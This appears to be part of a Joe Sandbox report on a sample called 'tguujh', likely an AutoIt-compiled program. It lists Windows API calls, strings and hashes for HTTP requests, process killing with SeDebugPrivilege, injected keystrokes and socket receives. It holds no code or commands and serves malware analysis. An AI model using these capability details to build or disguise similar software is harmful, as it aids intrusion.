                                                              • GetDlgCtrlID.USER32 ref: 00CB28DE
                                                              • GetParent.USER32 ref: 00CB28FA
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB28FD
                                                              • GetDlgCtrlID.USER32(?), ref: 00CB2906
                                                              • GetParent.USER32(?), ref: 00CB291A
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB291D
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 711023334-1403004172
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CE43FC
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CE43FF
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00CE4426
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CE4449
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CE44C1
                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00CE450B
                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00CE4526
                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00CE4541
                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00CE4555
                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00CE4572
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow
                                                              • String ID:
                                                              • API String ID: 312131281-0
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CCCBCF
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CCCBF7
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CCCC27
                                                              • GetLastError.KERNEL32 ref: 00CCCC7F
                                                              • SetEvent.KERNEL32(?), ref: 00CCCC93
                                                              • InternetCloseHandle.WININET(00000000), ref: 00CCCC9E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 3113390036-3916222277
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C95437,?,?,Bad directive syntax error,00CEDCD0,00000000,00000010,?,?), ref: 00CBA14B
                                                              • LoadStringW.USER32(00000000,?,00C95437,?), ref: 00CBA152
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CBA216
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 858772685-4153970271
                                                              APIs
                                                              • GetParent.USER32 ref: 00CB293B
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00CB2950
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CB29DD
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1290815626-3381328864
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CCCADF
                                                              • GetLastError.KERNEL32 ref: 00CCCAF2
                                                              • SetEvent.KERNEL32(?), ref: 00CCCB06
                                                                • Part of subcall function 00CCCBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CCCBCF
                                                                • Part of subcall function 00CCCBB0: GetLastError.KERNEL32 ref: 00CCCC7F
                                                                • Part of subcall function 00CCCBB0: SetEvent.KERNEL32(?), ref: 00CCCC93
                                                                • Part of subcall function 00CCCBB0: InternetCloseHandle.WININET(00000000), ref: 00CCCC9E
                                                              Similarity
                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 337547030-0
                                                              APIs
                                                                • Part of subcall function 00CB42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CB42E6
                                                                • Part of subcall function 00CB42CC: GetCurrentThreadId.KERNEL32 ref: 00CB42ED
                                                                • Part of subcall function 00CB42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CB2E43), ref: 00CB42F4
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB2E4D
                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CB2E6B
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00CB2E6F
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB2E79
                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CB2E91
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00CB2E95
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB2E9F
                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CB2EB3
                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00CB2EB7
                                                              Similarity
                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                              • String ID:
                                                              • API String ID: 2014098862-0
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00CB1CD9,?,?,00000000), ref: 00CB209C
                                                              • HeapAlloc.KERNEL32(00000000,?,00CB1CD9,?,?,00000000), ref: 00CB20A3
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CB1CD9,?,?,00000000), ref: 00CB20B8
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00CB1CD9,?,?,00000000), ref: 00CB20C0
                                                              • DuplicateHandle.KERNEL32(00000000,?,00CB1CD9,?,?,00000000), ref: 00CB20C3
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CB1CD9,?,?,00000000), ref: 00CB20D3
                                                              • GetCurrentProcess.KERNEL32(00CB1CD9,00000000,?,00CB1CD9,?,?,00000000), ref: 00CB20DB
                                                              • DuplicateHandle.KERNEL32(00000000,?,00CB1CD9,?,?,00000000), ref: 00CB20DE
                                                              • CreateThread.KERNEL32(00000000,00000000,00CB2104,00000000,00000000,00000000), ref: 00CB20F8
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              APIs
                                                                • Part of subcall function 00CBDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 00CBDCC1
                                                                • Part of subcall function 00CBDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 00CBDCCF
                                                                • Part of subcall function 00CBDC9C: CloseHandle.KERNELBASE(00000000), ref: 00CBDD9C
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CDAACC
                                                              • GetLastError.KERNEL32 ref: 00CDAADF
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CDAB12
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CDABC7
                                                              • GetLastError.KERNEL32(00000000), ref: 00CDABD2
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CDAC23
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CE4284
                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00CE4299
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CE42B3
                                                              • _wcslen.LIBCMT ref: 00CE42F8
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CE4325
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CE4353
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcslen
                                                              • String ID: SysListView32
                                                              • API String ID: 2147712094-78025650
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CBC5D9
                                                              • IsMenu.USER32(00000000), ref: 00CBC5F9
                                                              • CreatePopupMenu.USER32 ref: 00CBC62F
                                                              • GetMenuItemCount.USER32(01305E38), ref: 00CBC680
                                                              • InsertMenuItemW.USER32(01305E38,?,00000001,00000030), ref: 00CBC6A8
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                              • String ID: 0$2
                                                              • API String ID: 93392585-3793063076
                                                              Similarity
                                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 642191829-3771769585
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit
                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                              • API String ID: 2610073882-625585964
                                                              • Opcode ID: 1545494beda67423941ee8507fada3e5496661343e78cddf3a132d131a46b528
                                                              • Instruction ID: b66b355636472c1dd12426bb903ff03e9b332eb5d552d88dbebe5e5e889e7a4e
                                                              • Opcode Fuzzy Hash: 1545494beda67423941ee8507fada3e5496661343e78cddf3a132d131a46b528
                                                              • Instruction Fuzzy Hash: EF91B471A00219AFDF24CFA5CC44FAEBBB8EF45714F10815AF615AB280D770AA45CFA0
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00CD42C8
                                                              • CharUpperBuffW.USER32(?,?), ref: 00CD43D7
                                                              • _wcslen.LIBCMT ref: 00CD43E7
                                                              • VariantClear.OLEAUT32(?), ref: 00CD457C
                                                                • Part of subcall function 00CC15B3: VariantInit.OLEAUT32(00000000), ref: 00CC15F3
                                                                • Part of subcall function 00CC15B3: VariantCopy.OLEAUT32(?,?), ref: 00CC15FC
                                                                • Part of subcall function 00CC15B3: VariantClear.OLEAUT32(?), ref: 00CC1608
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4137639002-1221869570
                                                              • Opcode ID: e74904a3da908dcf83f77dc61392c57dae1b01429c09ccd5d8b3cb1721aaf4f1
                                                              • Instruction ID: 7a6aa55b14ab762cf177eb1d83c5acde4a6c09c3b4f8622325d10b08857d99c6
                                                              • Opcode Fuzzy Hash: e74904a3da908dcf83f77dc61392c57dae1b01429c09ccd5d8b3cb1721aaf4f1
                                                              • Instruction Fuzzy Hash: C0916A756083459FC704DF28C48196AB7E5FF88314F14882EFA9A9B351DB30ED49DB52
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 00CE2AE2
                                                              • GetMenuItemCount.USER32(00000000), ref: 00CE2B14
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CE2B3C
                                                              • _wcslen.LIBCMT ref: 00CE2B72
                                                              • GetMenuItemID.USER32(?,?), ref: 00CE2BAC
                                                              • GetSubMenu.USER32(?,?), ref: 00CE2BBA
                                                                • Part of subcall function 00CB42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CB42E6
                                                                • Part of subcall function 00CB42CC: GetCurrentThreadId.KERNEL32 ref: 00CB42ED
                                                                • Part of subcall function 00CB42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CB2E43), ref: 00CB42F4
                                                               • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CE2C42 (0x111 = WM_COMMAND: after walking the target window's menu by item text, the matching item ID is activated by posting the command to that window)
                                                                • Part of subcall function 00CBF1A7: Sleep.KERNEL32 ref: 00CBF21F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                              • String ID:
                                                              • API String ID: 4196846111-0
                                                              • Opcode ID: fcd7bea3a1d52f7360b21b6635685c9798550f9cc16c0b8b72b40a11969fcfdf
                                                              • Instruction ID: bcf44bdcd3bc37f98e943bf45ab46e7c92367cfd320ab364db345aeb3717c375
                                                              • Opcode Fuzzy Hash: fcd7bea3a1d52f7360b21b6635685c9798550f9cc16c0b8b72b40a11969fcfdf
                                                              • Instruction Fuzzy Hash: 7A71C136A00245AFDB14DF66C885BAEBBF5EF48310F108459E826EB341DB74EE41DB90
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 00CE8896
                                                              • IsWindowEnabled.USER32(00000000), ref: 00CE88A2
                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00CE897D
                                                              • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00CE89B0
                                                              • IsDlgButtonChecked.USER32(?,00000000), ref: 00CE89E8
                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00CE8A0A
                                                               • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CE8A22 (0xA1 = WM_NCLBUTTONDOWN with wParam 2 = HTCAPTION: a synthetic title-bar click sent to the control's parent)
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                              • String ID:
                                                              • API String ID: 4072528602-0
                                                              • Opcode ID: 88799bac59d091afe309cea0fe00a40ab306c1c784443cb32bca7c5e1b0ca871
                                                              • Instruction ID: 86eba5a8fd2882a0334127495140a5291aec9a4c85bd21d48238e71bc26cbd26
                                                              • Opcode Fuzzy Hash: 88799bac59d091afe309cea0fe00a40ab306c1c784443cb32bca7c5e1b0ca871
                                                              • Instruction Fuzzy Hash: 0171D534A042C4AFDF359F56C894FBA7BB9EF09300F540459F869972A2CB31AE49DB11
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CB80D1
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CB80F7
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00CB80FA
                                                              • SysAllocString.OLEAUT32 ref: 00CB811B
                                                              • SysFreeString.OLEAUT32 ref: 00CB8124
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00CB813E
                                                              • SysAllocString.OLEAUT32(?), ref: 00CB814C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 3d6bc4582f56b5b321cf9beff695c4ac45efc7ee62bdcdf01533afcce1ba82b3
                                                              • Instruction ID: 8030c646cfe8e54debe1c1254b3ff84719124f090d8ec1776d589d76dc49c228
                                                              • Opcode Fuzzy Hash: 3d6bc4582f56b5b321cf9beff695c4ac45efc7ee62bdcdf01533afcce1ba82b3
                                                              • Instruction Fuzzy Hash: B4217475201204AF9B10AFACDC89EEE77ECEB49360B008125F915DB2E0DA74ED49CB64
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00CC0DAE
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CC0DEA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateHandlePipe
                                                              • String ID: nul
                                                              • API String ID: 1424370930-2873401336
                                                              • Opcode ID: 2fadd37b121a4ac434d0d8b86c9f6e5f6ca21d72d82ced5cdf93284db03c2076
                                                              • Instruction ID: 7d5bfcd13c295b4ff0ad53d24265d2074e02ea4e25a9bccc4c1074e8962ad0a8
                                                              • Opcode Fuzzy Hash: 2fadd37b121a4ac434d0d8b86c9f6e5f6ca21d72d82ced5cdf93284db03c2076
                                                              • Instruction Fuzzy Hash: A4213770540305EFDB209F69D844F9ABBA4AF45720F304E1DF9B2AB2E0D7709A40CB50
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00CC0E82
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CC0EBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateHandlePipe
                                                              • String ID: nul
                                                              • API String ID: 1424370930-2873401336
                                                              • Opcode ID: 0a82da2ac00304e4c4782312e49fcda09903f05ddf7762ff36e5ac2a0ced8aaf
                                                              • Instruction ID: 6c8b4ef3f0060a967b29c2a1708e405a6764458cd7738aef4f959716e4eea074
                                                              • Opcode Fuzzy Hash: 0a82da2ac00304e4c4782312e49fcda09903f05ddf7762ff36e5ac2a0ced8aaf
                                                              • Instruction Fuzzy Hash: 56211971504306EBDB209FA9DC44F9AB7A8AF55724F300A1DF9B1E72E0D7709A81CB61
                                                              APIs
                                                                • Part of subcall function 00C5771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C57759
                                                                • Part of subcall function 00C5771B: GetStockObject.GDI32(00000011), ref: 00C5776D
                                                                • Part of subcall function 00C5771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C57777
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CE4A71
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CE4A7E
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CE4A89
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CE4A98
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CE4AA4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: e61f7a7724bdca18a1cfcd3e2a049c3ac04e721618120a970b5e0b2665027f8f
                                                              • Instruction ID: d4ed2990c0c6799e1954bb68f30697fd25bdeb443ba50d2ed8d2f29c137d9a78
                                                              • Opcode Fuzzy Hash: e61f7a7724bdca18a1cfcd3e2a049c3ac04e721618120a970b5e0b2665027f8f
                                                              • Instruction Fuzzy Hash: 4711B6B114021DBEEF118F65DC85EE77F9DEF08758F004111FA18E6050CA769C61ABA4
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CBE23D
                                                              • LoadStringW.USER32(00000000), ref: 00CBE244
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CBE25A
                                                              • LoadStringW.USER32(00000000), ref: 00CBE261
                                                               • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CBE2A5 (0x11010 = MB_ICONERROR | MB_SYSTEMMODAL | MB_SETFOREGROUND; together with the "%s (%d) : ==> %s: %s %s" format this is the AutoIt interpreter's script-error dialog)
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00CBE282
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 4072794657-3128320259
                                                              • Opcode ID: f8406e0719ed819da87866bcd588361770a2e5f4cac1ce203b3c1bb77492af31
                                                              • Instruction ID: 46aba95ef84031ec14b38dc381ba3fbc0a5abd14cf313e6f406fe4da4b55bc02
                                                              • Opcode Fuzzy Hash: f8406e0719ed819da87866bcd588361770a2e5f4cac1ce203b3c1bb77492af31
                                                              • Instruction Fuzzy Hash: 290131F6900258BFE711ABE4DDC9FEB776CDB08700F0149A1B746EA051EA749E848B71
                                                              APIs
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00CD271D
                                                               • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00CD273E (ordinal-only import; ordinal 17 in wsock32.dll is recvfrom, and the trailing 0x10 matches a sockaddr_in length, so with the select/__WSAFDIsSet, htons and inet_ntoa calls around it this is a datagram receive path)
                                                              • WSAGetLastError.WSOCK32 ref: 00CD274F
                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00CD2838
                                                              • inet_ntoa.WSOCK32(?), ref: 00CD27E9
                                                                • Part of subcall function 00CB4277: _strlen.LIBCMT ref: 00CB4281
                                                                • Part of subcall function 00CD3B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00CCF569), ref: 00CD3B9D
                                                              • _strlen.LIBCMT ref: 00CD2892
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                              • String ID:
                                                              • API String ID: 3203458085-0
                                                              • Opcode ID: 47165dc28a58b37f80432d9f15ff98dba976306b3eff5191061b2f3c31241365
                                                              • Instruction ID: 20e50e67ed2f2fbb5fb64bcc75b70e2d82c14e556a8892f9d46083fc2d991295
                                                              • Opcode Fuzzy Hash: 47165dc28a58b37f80432d9f15ff98dba976306b3eff5191061b2f3c31241365
                                                              • Instruction Fuzzy Hash: E5B1D335204300AFD324DF24C895E2ABBA5AF94318F54854DF5A64B3E2DB31EE86DB91
